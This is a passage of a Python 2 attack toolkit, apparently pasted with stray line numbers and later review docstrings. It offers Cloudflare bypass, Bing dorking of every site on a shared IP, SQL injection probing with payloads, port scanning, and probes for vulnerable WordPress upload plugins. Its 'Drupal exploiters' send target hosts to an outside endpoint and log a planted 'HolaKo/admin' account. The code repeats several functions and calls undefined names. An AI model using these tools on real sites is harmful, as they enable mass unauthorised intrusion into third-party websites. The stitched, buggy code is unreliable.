            site.replace('http://', '')  # result discarded
            site.replace('/', '')  # result discarded
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print '[*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error :
                    pass
    ############################
    #find the server banner
    def getServerBanner(self) :
        """
        GET http://<serverip>/ and print its Server response header (None when
        the header is absent).  Any failure is silently ignored.
        """
        clearScr()
        try:
            s = 'http://' + self.serverip
            httpresponse = urllib.urlopen(s)
            print '[*] Server header -> ', httpresponse.headers.getheader('server')
        except:
            pass
    ############################
    #greb the sqli
    def grabSqli(self) :
        """
        Collect Bing results for `ip:<serverip> php?id=` (offsets 1, 51, 101),
        de-duplicate them and hand the URLs to checkSqli().  Here `page += 50`
        is outside the try, so a failed page is skipped rather than retried.
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    x = findwebs[i]
                    lista.append(x)
            except:
                pass
            page += 50
        lista = unique(lista)
        self.checkSqli(lista)
    ############################
    #scan for sql injection
    def checkSqli(self, s):
        """
        Error-based SQL injection probe over the URLs in *s*: for every
        `name=value` in each query string and every payload, append the
        payload (via str.replace, so every occurrence of that parameter text
        in the URL is altered) and print the URL if any response line matches
        the database-error regex.  A URL without '?' raises IndexError, which
        -- like every other error, KeyboardInterrupt included -- the bare
        except swallows.  These requests go to every site on the shared
        host; confirm each is in scope before running this.
        """
        clearScr()
        print "[~] Checking SQL injection"
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        power = url.replace(param, param + payload.strip())
                        #print power
                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0 :
                                print '[*] SQLi found -> ', power
            except:
                pass
    ############################
    ############################
    #scan for ports
    def portScanner(self, mode, ran) :
        """
        TCP connect scan of self.serverip.  mode 1: the ports in *ran*, a
        string 'a-b' (b itself is excluded by range()); a malformed string
        raises ValueError.  mode 2: nine common ports.  do_it() rebinds
        `sock` to connect_ex()'s result and never closes the socket, and the
        timeout is commented out, so filtered ports block for the OS default
        connect timeout.
        """
        clearScr()
        print "[~] Scanning Ports"
        def do_it(ip, port):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #sock.settimeout(5)
            sock = sock.connect_ex((ip,port))  # now an int; the socket is never closed
            if sock == 0:
                print "[*] Port %i is open" % port

        if mode == 1 :
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2 :
            for port in [80,21,22,2082,25,53,110,443,143] :
                # didn't use multithreading cos it's few ports
                do_it(self.serverip, port)
# Menu text for maine() (the Drupal sub-menu); '\t' is interpreted since
# this is not a raw string.
minu ='''
\t 1: Drupal Bing Exploiter
\t 2: Get Drupal Websites
\t 3: Drupal Mass Exploiter
\t 99: Back To Main Menu
'''
  802.  
  803.  
804. # Drupal Bing exploiter: submits every Bing-listed host on a server to a remote third-party endpoint (see the docstring)
def drupal():
    """Ask for a server IP, scrape Bing for sites on it and submit each host
    to a remote "exploit" endpoint at crig-alda.ro.

    NOTE(review) -- read before using:
      * The exploit is not in this file.  Every hostname found is sent to
        http://crig-alda.ro/wp-admin/css/index2.php?url=<host>, an opaque
        third-party service that cannot be audited from here and that
        receives your complete target list.
      * The "user:HolaKo / pass:admin" lines are fixed strings printed when
        the response contains "User : HolaKo"; nothing here verifies that
        such an account exists on the target.
      * On the first hit the write to up.txt references `user` and `pwd`,
        which are never defined -> NameError, caught by the except below.
        The file handle is never closed.
      * `first=` advances by 1 per request rather than by a page size, so
        the 50 Bing requests return heavily overlapping result sets.
      * The paste lost its indentation; sys.exit(0) is placed after the
        loop here.  If it was inside the except, the first error exits.
    """
    ip = raw_input('1- IP : ')
    page = 1
    while page <= 50 :

        url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
        req = urllib2.Request(url)
        opreq = urllib2.urlopen(req).read()
        findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
        page += 1

        for url in findurl :
            try :

                urlpa = urlparse(url)
                site = urlpa.netloc

                print "[+] Testing At "+site
                resp = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+site+'&submit=submit')  # remote, unaudited
                read=resp.read()
                if "User : HolaKo" in read:
                    print "Exploit found =>"+site

                    print "user:HolaKo\npass:admin"
                    a = open('up.txt','a')  # never closed
                    a.write(site+'\n')
                    a.write("user:"+user+"\npass:"+pwd+"\n")  # `user`/`pwd` undefined -> NameError
                else :
                    print "[-] Expl Not Found :( "

            except Exception as ex :
                print ex
    sys.exit(0)
  840.  
  841.  
842. # Drupal site extractor: lists the distinct hosts Bing returns for the `ip:<ip> node` dork
def getdrupal():
    """Prompt for a server IP and print every distinct host Bing lists for `ip:<ip> node`.

    Walks result offsets 1..50 one at a time and prints each netloc the
    first time it is seen.  Network errors are not handled.
    """
    ip = raw_input('Enter The Ip : ')
    seen = list()
    for page in range(1, 51):
        url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
        html = urllib2.urlopen(urllib2.Request(url)).read()
        for hit in re.findall('<div class="b_title"><h2><a href="(.*?)" h=', html):
            host = urlparse(hit).netloc
            if host in seen:
                continue
            print(host)
            seen.append(host)
  861.  
  862.  
863. # Drupal mass exploiter: submits every URL in a text file to the same remote endpoint used by drupal()
def drupallist():
    """Read URLs from a user-named text file and submit each to the remote
    crig-alda.ro endpoint also used by drupal(), appending "successes" to
    drupal.txt.

    NOTE(review): the endpoint is an unaudited third-party service that
    receives every URL in the list; the username/password printed and saved
    are fixed strings from this script, not values returned by the server.
    Neither the input file nor drupal.txt is ever closed, a missing input
    file raises IOError out of the function, and the failure message prints
    the raw line including its trailing newline.
    """
    listop = raw_input("Enter The list Txt :")
    fileopen = open(listop,'r')  # never closed
    content = fileopen.readlines()
    for i in content :
        url=i.strip()
        try :
            openurl = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+url+'&submit=submit')  # remote, unaudited
            readcontent = openurl.read()
            if "Success" in readcontent :
                print "[+]Success =>"+url
                print "[-]username:HolaKo\n[-]password:admin"
                save = open('drupal.txt','a')  # never closed
                save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")

            else :
                print i + "=> exploit not found "
        except Exception as ex :
            print ex
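def maine():
    """Drupal sub-menu loop: show `minu`, run the chosen action, ask to continue.

    1 drupal(), 2 getdrupal(), 3 drupallist(), 99 menu().
    Fixes: the choice was read once *before* the `while True`, so an
    unrecognised answer (including the unlisted option 4, which called an
    undefined about() -> NameError) spun through the continue prompt
    forever; the prompt is now inside the loop.  `con[0]` raised IndexError
    on an empty continue answer -- an empty answer now counts as yes, an
    answer starting with N exits, and anything else re-shows the menu.
    """
    while True:
        print(minu)
        choose = raw_input("choose a number :").strip()
        if choose == "1":
            drupal()
        elif choose == "2":
            getdrupal()
        elif choose == "3":
            drupallist()
        elif choose == "99":
            menu()
        else:
            print("unknown choice: %r" % choose)
        con = raw_input('Continue [Y/n] -> ').strip().upper()
        if con.startswith('N'):
            exit()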
def unique(seq):
    """Order-preserving de-duplication of the hashable items in *seq*; returns a list."""
    out = []
    seen = set()
    for value in seq:
        if value not in seen:
            out.append(value)
            seen.add(value)
    return out
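def bing_all_grabber(s):
    """Return the de-duplicated 'http://www.host/' origins Bing lists for `ip:<s>`.

    Fetches offsets 1, 51 and 101 (50 results each) and keeps the http://
    links from the result anchors, prefixing 'www.' when the host name does
    not already contain 'www' (unchanged heuristics).  Fix: `page += 50`
    used to sit inside the try, so one URLError retried the same offset
    forever; the counter now advances on every pass, responses are closed,
    and a failed page is simply skipped.
    """
    lista = []
    for page in (1, 51, 101):
        bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
        try:
            openbing = urllib2.urlopen(bing)
        except urllib2.URLError:
            continue
        try:
            readbing = openbing.read()
        finally:
            openbing.close()
        for anchor in re.findall('<h2><a href="(.*?)"', readbing):
            for host in re.findall('http://(.*?)/', anchor):
                prefix = 'http://' if 'www' in host else 'http://www.'
                lista.append(prefix + host + '/')
    return unique(lista)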
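def check_wordpress(sites):
    """Return the entries of *sites* (each ending in '/') whose wp-login.php answers 200.

    urllib2.urlopen() raises HTTPError (an IOError subclass) for 4xx/5xx,
    so the except clause is the normal "not WordPress" path.  Fix: the bare
    `except:` also swallowed KeyboardInterrupt; only IOError and ValueError
    (malformed URL) are skipped now, and each response is closed.  Returns
    [] for an empty input without touching the network.
    """
    wp = []
    for site in sites:
        try:
            resp = urllib2.urlopen(site + 'wp-login.php')
        except (IOError, ValueError):
            continue
        try:
            if resp.getcode() == 200:
                wp.append(site)
        finally:
            resp.close()
    return wp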
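def check_joomla(sites):
    """Return the entries of *sites* (each ending in '/') whose /administrator answers 200.

    urllib2.urlopen() raises HTTPError (an IOError subclass) for 4xx/5xx,
    so the except clause is the normal "not Joomla" path.  Fix: the bare
    `except:` also swallowed KeyboardInterrupt; only IOError and ValueError
    (malformed URL) are skipped now, and each response is closed.  Returns
    [] for an empty input without touching the network.
    """
    joomla = []
    for site in sites:
        try:
            resp = urllib2.urlopen(site + 'administrator')
        except (IOError, ValueError):
            continue
        try:
            if resp.getcode() == 200:
                joomla.append(site)
        finally:
            resp.close()
    return joomla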
def wppjmla():
    """Prompt for a server IP, grab its Bing-listed sites and print which look
    like WordPress (wp-login.php -> 200) and which like Joomla (administrator -> 200)."""
    ipp = raw_input('Enter Target IP: ')
    candidates = bing_all_grabber(str(ipp))
    wordpress = check_wordpress(candidates)
    joomla = check_joomla(candidates)
    for entry in wordpress:
        print(entry)
    print('[+] Found !  %d  Wordpress Websites' % len(wordpress))
    print('-' * 30 + '\n')
    for entry in joomla:
        print(entry)
    print('[+] Found !  %d  Joomla Websites' % len(joomla))
    print('\n')
970. # Entry point for TNscan: instantiating tnn() prompts for the target IP and starts the scan menu
class tnn():
    """Entry point for the 'Privat Tools' menu: prompt for a target IP and start TNscan.

    Instantiating the class is the call; the TNscan instance is not kept.
    """
    def __init__(self):
        clearScr()
        target = raw_input("Target IP : ")
        TNscan(target)
  976. ############################
class bcolors:
    """ANSI colour placeholders; every code is the empty string, so colour output is disabled."""
    HEADER = OKBLUE = OKGREEN = WARNING = FAIL = ENDC = CYAN = ''
class colors():
    """Second set of terminal colour prefixes; not referenced in this excerpt.

    As with bcolors, every value is the empty string, so any text prefixed
    with these attributes is printed without colour.
    """
    PURPLE = CYAN = DARKCYAN = BLUE = GREEN = YELLOW = RED = BOLD = ENDC = ''
def grabsqli(ip):
    """Bing-search pages on *ip* matching "upload" and run checksqli on each.

    Despite the name nothing SQL-related is tested: checksqli only looks for
    a file-input element in the fetched page. The query is ``ip:<ip> upload``
    with 50 results per request; ``first`` starts at 1 and steps by 10 while
    <= 21, so three overlapping result pages are requested. *ip* is inserted
    into the query string unescaped.
    """
    try :
        # bcolors.OKBLUE is '' in this file, so no colour code is emitted.
        print bcolors.OKBLUE + "Check_Uplaod... "
        print '\n'

        page = 1
        while page <= 21:
            bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            # Result links are scraped from Bing's raw HTML; if the markup
            # changes this silently yields nothing.
            findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
            sites = findwebs
            for i in sites :
                try :
                    # `response` is fetched but never used; checksqli fetches
                    # the same URL again, so each result is requested twice.
                    response = urllib2.urlopen(i).read()
                    checksqli(i)
                except urllib2.HTTPError, e:
                    # No-op: str(sites).strip(i) builds a new string and
                    # discards it; `sites` is not modified.
                    str(sites).strip(i)

            page = page + 10
    except :
        # Bare except: any failure (the Bing request itself, a non-HTTPError
        # from a result fetch, even KeyboardInterrupt) ends the scan silently.
        pass
def checksqli(sqli):
    """Fetch *sqli* and print it when the response body contains ``type="file"``.

    The name is misleading: this is a file-upload-form heuristic, not a SQL
    injection check. Errors from urlopen propagate to the caller (grabsqli
    catches HTTPError per site; anything else reaches its outer bare except).
    """
    body = urllib2.urlopen(sqli).read()
    # Presence of at least one match is all that matters here.
    if re.search('type="file"', body):
        print(" Found ==> " + sqli)
def sqlscan():
    """Interactive entry point: read an IP from the user and hand it to grabsqli.

    The input is passed through as typed, without validation.
    """
    grabsqli(raw_input('Enter IP : '))
  1025. # found this code on stackoverflow.com/questions/19278877
def unique(seq):
    """Return the elements of *seq* with duplicates removed, first occurrence
    kept and original order preserved.

    Elements must be hashable. An empty iterable yields an empty list.
    """
    seen = set()
    ordered = []
    for item in seq:
        if item not in seen:
            seen.add(item)
            ordered.append(item)
    return ordered
def bing_all_grabber(s):
    """Collect site base URLs that Bing attributes to IP *s*.

    Issues Bing queries for ``ip:<s>`` with count=50, stepping ``first`` by
    50 while <= 101 (three requests), scrapes result links from the HTML,
    normalises each to ``http://<host>/`` and returns the de-duplicated list
    in first-seen order (via unique).

    Caveats visible in the code:
    - Only ``http://`` links are kept; the host regex never matches https.
    - ``'www' not in item`` is a substring test, so a host that merely
      contains "www" anywhere is left as is, and every other host gets a
      ``www.`` prefix whether or not it is served under that name.
    - ``page`` only advances inside the try, so on urllib2.URLError the same
      query is retried until it succeeds.
    - *s* is inserted into the query string unescaped.
    """
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            # Scrapes Bing's result markup; silently yields nothing if the
            # markup changes.
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                allnoclean = findwebs[i]
                # Every "http://<host>/" fragment inside the link is taken,
                # not just the leading one.
                findall1 = re.findall('http://(.*?)/', allnoclean)
                for idx, item in enumerate(findall1):
                    if 'www' not in item:
                        findall1[idx] = 'http://www.' + item + '/'
                    else:
                        findall1[idx] = 'http://' + item + '/'
                lista.extend(findall1)

            page += 50
        except urllib2.URLError:
            # HTTPError is a subclass of URLError, so error statuses from
            # Bing land here too and leave `page` unchanged.
            pass

    final = unique(lista)
    return final
def check_wordpress(sites):
    """Return the subset of *sites* whose ``wp-login.php`` answers HTTP 200.

    This is the second definition of check_wordpress in the file and the one
    in effect at runtime; it is identical in behaviour to the earlier one.
    The path is appended by plain string concatenation, one GET per site with
    urllib2 defaults and no timeout, and any exception at all (bare except)
    silently drops that site. A 200 only shows the path answered; hosts that
    return 200 for arbitrary paths match as well.
    """
    hits = []
    for site in sites:
        try:
            status = urllib2.urlopen(site + 'wp-login.php').getcode()
        except:
            # Best-effort probe: an unreachable or erroring site is skipped.
            continue
        if status == 200:
            hits.append(site)
    return hits
def check_wpstorethemeremotefileupload(sites):
    """Return sites where ``wp-content/themes/WPStore/upload/index.php`` answers 200.

    A 200 status is the only evidence gathered: it says the path answered,
    not that the component is present or that anything about it is
    exploitable, and hosts that answer 200 for any path will match too.
    Requests use urllib2 defaults with no timeout; any exception (bare
    except) drops the site silently.
    """
    path = 'wp-content/themes/WPStore/upload/index.php'

    def _answers_200(site):
        try:
            return urllib2.urlopen(site + path).getcode() == 200
        except:
            return False

    return [site for site in sites if _answers_200(site)]
def check_wpcontactcreativeform(sites):
    """Return sites where the sexy-contact-form fileupload ``index.php`` answers 200.

    Same probe pattern as the other check_* helpers: one GET per site via
    string concatenation, urllib2 defaults, no timeout, bare except. A 200
    only means the path answered and is not proof of presence or
    vulnerability; catch-all 200 hosts match as well.
    """
    path = 'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'

    def _answers_200(site):
        try:
            return urllib2.urlopen(site + path).getcode() == 200
        except:
            return False

    return [site for site in sites if _answers_200(site)]
def check_wplazyseoplugin(sites):
    """Return sites where ``wp-content/plugins/lazy-seo/lazyseo.php`` answers 200.

    One GET per site with urllib2 defaults and no timeout; any exception
    (bare except) silently skips the site. The status code is the only
    signal, so hosts returning 200 for arbitrary paths are listed too.
    """
    path = 'wp-content/plugins/lazy-seo/lazyseo.php'

    def _answers_200(site):
        try:
            return urllib2.urlopen(site + path).getcode() == 200
        except:
            return False

    return [site for site in sites if _answers_200(site)]
def check_wpeasyupload(sites):
    """Return sites where the easy-comment-uploads ``upload-form.php`` answers 200.

    Identical probe pattern to the other check_* helpers: concatenated path,
    urllib2 defaults, no timeout, bare except that drops failing sites. A 200
    is a weak signal on its own; catch-all 200 hosts match as well.
    """
    path = 'wp-content/plugins/easy-comment-uploads/upload-form.php'

    def _answers_200(site):
        try:
            return urllib2.urlopen(site + path).getcode() == 200
        except:
            return False

    return [site for site in sites if _answers_200(site)]
def check_wpsymposium(sites):
    """Return sites where ``wp-symposium/server/file_upload_form.php`` answers 200.

    NOTE(review): the append targets ``wpsycmium``, a name not defined in
    this function and not visible anywhere in this excerpt; the NameError it
    raises is caught by the bare except, so the list returned is always
    empty whatever the probe saw. Unlike the sibling helpers the path is not
    under ``wp-content/``.
    """
    wpsymposium = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-symposium/server/file_upload_form.php').getcode() == 200 :
                wpsycmium.append(site)
        except :
            # Swallows everything, including the NameError from the line above.
            pass

    return wpsymposium
def wpminiscanner():
    """Interactive driver: enumerate sites on one IP via Bing and print which
    of them answer each of the check_* probes.

    Flow: prompt for an IP, collect base URLs with bing_all_grabber, run the
    six check_* helpers in order, then print every list with a count line.
    All network work completes before the first line of output. The
    "exploit" wording in the summary lines overstates what was measured:
    each helper only records an HTTP 200 on a fixed path.
    """
    ip = raw_input('Enter IP : ')
    sites = bing_all_grabber(str(ip))
    wordpress = check_wordpress(sites)
    wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
    wpcontactcreativeform = check_wpcontactcreativeform(sites)
    wplazyseoplugin = check_wplazyseoplugin(sites)
    wpeasyupload = check_wpeasyupload(sites)
    wpsymposium = check_wpsymposium(sites)

    def _report(found, label, tail):
        # One hit per line, then the summary line, then a trailer.
        for hit in found:
            print hit
        print '[*] Found, ', len(found), label
        print tail

    separator = '-'*30+'\n'
    _report(wordpress, ' wordpress sites.', separator)
    _report(wpstorethemeremotefileupload, ' wp_storethemeremotefileupload exploit.', separator)
    _report(wpcontactcreativeform, ' wp_contactcreativeform exploit.', separator)
    _report(wplazyseoplugin, ' wp_lazyseoplugin exploit.', separator)
    _report(wpeasyupload, ' wp_easyupload exploit.', separator)
    # Last section ends with a blank line instead of the dashed separator.
    _report(wpsymposium, ' wp_sympsiup exploit.', '\n')
  1150. ############################
  1151. #begin :D
if __name__ == "__main__":
    # Script entry point: menu() is the interactive top-level menu, defined
    # earlier in the file (outside this excerpt).
    menu()